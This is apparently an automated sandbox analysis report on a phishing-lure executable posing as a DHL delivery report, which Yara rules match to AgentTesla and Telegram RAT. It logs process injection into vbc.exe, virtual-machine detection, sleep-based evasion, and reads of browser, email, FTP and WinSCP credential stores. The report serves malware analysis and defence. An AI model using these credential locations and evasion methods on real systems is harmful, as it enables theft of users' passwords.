Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dhl recent package delivery report needs attention.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.vbc.exe.610000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.vbc.exe.610000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.vbc.exe.610000.4.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.vbc.exe.610000.4.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Dhl recent package delivery report needs attention.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Dhl recent package delivery report needs attention.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Code function: 1_2_049E2857 push ebx; ret

1_2_049E287A

Source: initial sample

Static PE information: section name: .text entropy: 7.52092762283

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	File created: \dhl recent package delivery report needs attention.exe
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	File created: \dhl recent package delivery report needs attention.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe TID: 6252	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe TID: 6448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6532	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6508	Thread sleep count: 4344 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6508	Thread sleep count: 4125 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 4344			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 4125			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: vbc.exe, 00000002.00000002.636927086.0000000004E6F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 2_2_0A102DB0 LdrInitializeThunk,

2_2_0A102DB0

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 612000	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 646000	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 648000	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5CE008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Queries volume information: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	211 Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Disable or Modify Tools	2 OS Credential Dumping	114 System Information Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Input Capture	1 Query Registry	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
